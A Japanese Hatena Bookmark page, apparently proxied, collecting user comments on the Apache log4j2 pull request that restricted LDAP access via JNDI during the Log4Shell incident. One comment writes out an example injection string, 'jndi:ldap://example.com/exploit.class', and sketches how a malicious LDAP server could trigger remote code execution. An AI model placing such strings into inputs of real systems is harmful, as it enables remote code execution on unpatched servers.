Movatterモバイル変換

[0]ホーム
URL:

はてなブックマークアプリ

サクサク読めて、
アプリ限定の機能も多数!

アプリで開く

はてなブックマーク

  • はてなブックマーク
  • テクノロジー
  • Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2
  • Twitterでシェア
  • Facebookでシェア

気に入った記事をブックマーク

  • 気に入った記事を保存できます
    保存した記事の一覧は、はてなブックマークで確認・編集ができます
  • 記事を読んだ感想やメモを書き残せます
  • 非公開でブックマークすることもできます
適切な情報に変更

エントリーの編集

loading...

エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。

タイトルガイドライン

このページのオーナーなので以下のアクションを実行できます

タイトル、本文などの情報を
再取得することができます
コメントを非表示にできますコメント表示の設定

ブックマークしました

ここにツイート内容が記載されますhttps://b.hatena.ne.jp/URLはspanで囲んでください

Twitterで共有

ONにすると、次回以降このダイアログを飛ばしてTwitterに遷移します

38usersがブックマークコメント9

    ガイドラインをご確認の上、良識あるコメントにご協力ください

    0/0
    入力したタグを追加

    現在プライベートモードです設定を変更する

    おすすめタグタグについて

      よく使うタグ

        Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2

        ガイドラインをご確認の上、良識あるコメントにご協力ください

        0/0
        入力したタグを追加

        現在プライベートモードです設定を変更する

        おすすめタグタグについて

          よく使うタグ

            はてなブックマーク

            はてなブックマークで
            関心をシェアしよう

            みんなの興味と感想が集まることで
            新しい発見や、深堀りがもっと楽しく

            ユーザー登録

            アカウントをお持ちの方はログインページ

            記事へのコメント9

            • 注目コメント
            • 新着コメント
            sudo_vi
            修正が公開でコミットされたの0dayが撒かれた今日の9日前だし、修正リリースはhotfixじゃなくて他の変更も混じったv2.15.0だし、ひどい

              その他
              efcl
              log4jの脆弱性修正のIssue

              その他
              manhole
              log4j2でJNDI機構から任意のコードを実行できてしまう脆弱性への対応

              その他
              tackman
              歴史の瞬間が収められるpull request

                その他
                rgfx
                該当コメこれか(;´Д`) https://github.com/apache/logging-log4j2/pull/608#issuecomment-989762094

                  その他
                  nilab
                  Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2 · GitHub

                    その他
                    roshi
                    jndi:ldap://example.com/exploit.class みたいなログをlog4jに書かせて、それに応答するLDAPサーバーを用意して任意のコードを実行させる形なのかな?

                      その他
                      mickn
                      “log4j 1.x contains a JMS Appender which can use JNDI. So I would say that, yes, log4j 1.x is also impacted by this vulnerability”

                        その他
                        daimatz
                        log4j の脆弱性の件、 2.x と 1.x も影響あるそうで / “log4j 1.x contains a JMS Appender which can use JNDI. So I would say that, yes, log4j 1.x is also impacted by this vulnerability”

                          その他
                          sudo_vi
                          sudo_vi修正が公開でコミットされたの0dayが撒かれた今日の9日前だし、修正リリースはhotfixじゃなくて他の変更も混じったv2.15.0だし、ひどい

                            2021/12/10リンク

                            その他

                            注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています

                            リンクを埋め込む

                            以下のコードをコピーしてサイトに埋め込むことができます

                            プレビュー
                            アプリのスクリーンショット
                            いまの話題をアプリでチェック!
                            • バナー広告なし
                            • ミュート機能あり
                            • ダークモード搭載
                            アプリをダウンロード

                            関連記事

                              usersに達しました!

                              さんが1番目にブックマークした記事「Restrict LDAP acc...」が注目されています。

                              気持ちをシェアしよう

                              ツイートする

                              Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2

                              You signed in with another tab or window. Reload to refresh yoursession. You signed out in anoth...You signed in with another tab or window. Reload to refresh yoursession. You signed out in another tab or window. Reload to refresh yoursession. Youswitched accounts on another tab or window. Reload to refresh yoursession. Dismiss alert

                              ブックマークしたユーザー

                              • sankaseki2021/12/17sankaseki
                              • kimata242021/12/16kimata24
                              • kyo_ago2021/12/14kyo_ago
                              • cutc-mt2021/12/13cutc-mt
                              • efcl2021/12/12efcl
                              • eichisanden2021/12/12eichisanden
                              • koroharo2021/12/11koroharo
                              • door-s-dev2021/12/11door-s-dev
                              • manhole2021/12/11manhole
                              • hououhada2021/12/11hououhada
                              • pulltop-birth2021/12/11pulltop-birth
                              • t_f_m2021/12/11t_f_m
                              • ktykogm2021/12/11ktykogm
                              • tackman2021/12/11tackman
                              • ahya3652021/12/11ahya365
                              • rgfx2021/12/10rgfx
                              • Untouchable2021/12/10Untouchable
                              • rna2021/12/10rna
                              すべてのユーザーの
                              詳細を表示します

                              ブックマークしたすべてのユーザー

                              同じサイトの新着

                              同じサイトの新着をもっと読む

                              いま人気の記事

                              いま人気の記事をもっと読む

                              いま人気の記事 - テクノロジー

                              いま人気の記事 - テクノロジーをもっと読む

                              新着記事 - テクノロジー

                              新着記事 - テクノロジーをもっと読む

                              同時期にブックマークされた記事

                              いま人気の記事 - 企業メディア

                              企業メディアをもっと読む

                              はてなブックマーク

                              公式Twitter

                              はてなのサービス

                              • App Storeからダウンロード
                              • Google Playで手に入れよう
                              Copyright © 2005-2025Hatena. All Rights Reserved.
                              設定を変更しましたx
                              [8]ページ先頭
                              ©2009-2025 Movatter.jp